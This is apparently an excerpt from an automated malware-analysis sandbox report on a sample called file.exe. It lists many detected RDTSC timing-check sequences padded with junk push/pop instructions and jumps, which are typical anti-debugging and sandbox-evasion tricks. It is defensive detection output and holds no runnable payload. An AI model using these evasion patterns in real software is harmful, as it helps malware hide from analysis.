              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EA66 second address: 83EA8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B56h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FBF65561B46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EA8C second address: 83EAA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845206 second address: 845210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF65561B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845607 second address: 84562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF651345A8h 0x00000009 jnp 00007FBF65134596h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84562A second address: 84562F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84562F second address: 845637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845637 second address: 84563D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845B7D second address: 845B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E75 second address: 845E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B57h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461A5 second address: 8461A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461A9 second address: 8461AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461AD second address: 8461B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846445 second address: 846489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B58h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF65561B55h 0x0000000e jmp 00007FBF65561B53h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C74 second address: 846C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A08B second address: 84A08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A08F second address: 84A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A09B second address: 84A09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A09F second address: 84A0B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FBF651345BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A0B0 second address: 84A0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A0B4 second address: 84A0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A347 second address: 84A36E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF65561B46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBF65561B58h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A78B second address: 84A79D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FBF6513459Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A79D second address: 84A7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A7A2 second address: 84A7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FBF65134596h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007FBF651345A4h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A7CC second address: 84A7D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A929 second address: 84A973 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF651345A0h 0x00000008 jmp 00007FBF6513459Ah 0x0000000d jnl 00007FBF6513459Ah 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 ja 00007FBF651345ACh 0x0000001c ja 00007FBF6513459Ch 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F445 second address: 84F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FBF65561B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A2E second address: 850A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBF65134596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A3A second address: 850A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850A3E second address: 850A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 850A42 second address: 850A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF65561B4Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8582EC second address: 858303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856406 second address: 856420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856420 second address: 856424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856424 second address: 856428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856428 second address: 85642E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85642E second address: 856438 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85656F second address: 85658E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FBF651345A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8569E6 second address: 8569EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8569EC second address: 8569F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8569F0 second address: 8569F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856B60 second address: 856B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856D02 second address: 856D31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF65561B51h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856D31 second address: 856D3B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF6513459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856E6E second address: 856E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856E72 second address: 856E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856FAB second address: 856FCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FBF65561B57h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857126 second address: 85712A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85712A second address: 857146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF65561B56h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857146 second address: 857176 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF651345B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8580D7 second address: 8580F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF65561B4Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FBF65561B46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8580F3 second address: 85810B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85810B second address: 858130 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FBF65561B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF65561B56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858130 second address: 858135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858135 second address: 85813B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85FCF7 second address: 85FCFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85FCFB second address: 85FD03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85FD03 second address: 85FD1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FBF65134596h 0x00000009 ja 00007FBF65134596h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FBF65134596h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85FD1B second address: 85FD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B50h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jmp 00007FBF65561B58h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F77A second address: 85F780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F780 second address: 85F7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FBF65561B4Eh 0x0000000b js 00007FBF65561B60h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBF65561B58h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F7BC second address: 85F7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FBF65134596h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86D939 second address: 86D956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF65561B56h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8712A9 second address: 8712AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8712AF second address: 8712B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8712B3 second address: 8712DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A3h 0x00000007 jmp 00007FBF651345A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8712DD second address: 8712E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87881C second address: 878824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 878824 second address: 87882F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87882F second address: 878835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 883937 second address: 88393B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88393B second address: 88393F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 883794 second address: 88379E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF65561B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88379E second address: 8837A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A004 second address: 88A029 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF65561B46h 0x00000008 jmp 00007FBF65561B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FBF65561B46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A029 second address: 88A02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A1A4 second address: 88A1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A341 second address: 88A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A34D second address: 88A352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A498 second address: 88A49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A49C second address: 88A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B59h 0x00000007 jmp 00007FBF65561B50h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A809 second address: 88A80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88A80D second address: 88A822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF65561B48h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88B36F second address: 88B392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF651345A1h 0x0000000d push eax 0x0000000e jng 00007FBF65134596h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88B392 second address: 88B39C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88F21C second address: 88F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 jp 00007FBF65134596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89CF69 second address: 89CFA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBF65561B4Bh 0x0000000e jmp 00007FBF65561B53h 0x00000013 jmp 00007FBF65561B56h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F4BA second address: 89F4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F4C0 second address: 89F4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F4C6 second address: 89F4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F300 second address: 89F314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B50h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F314 second address: 89F344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jnp 00007FBF65134596h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 jmp 00007FBF6513459Fh 0x0000001d pushad 0x0000001e jnl 00007FBF65134596h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89A462 second address: 89A468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AB77F second address: 8AB783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AB783 second address: 8AB7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FBF65561B57h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ADE35 second address: 8ADE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ADE39 second address: 8ADE56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBF65561B4Ch 0x0000000e jno 00007FBF65561B46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C247B second address: 8C247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C275C second address: 8C276D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C28E8 second address: 8C28F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF651345A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2D30 second address: 8C2D35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2EAD second address: 8C2EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBF65134596h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C2FE0 second address: 8C2FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBF65561B4Ch 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C74CF second address: 8C74D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C7A58 second address: 8C7A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF65561B51h 0x00000009 rdtsc
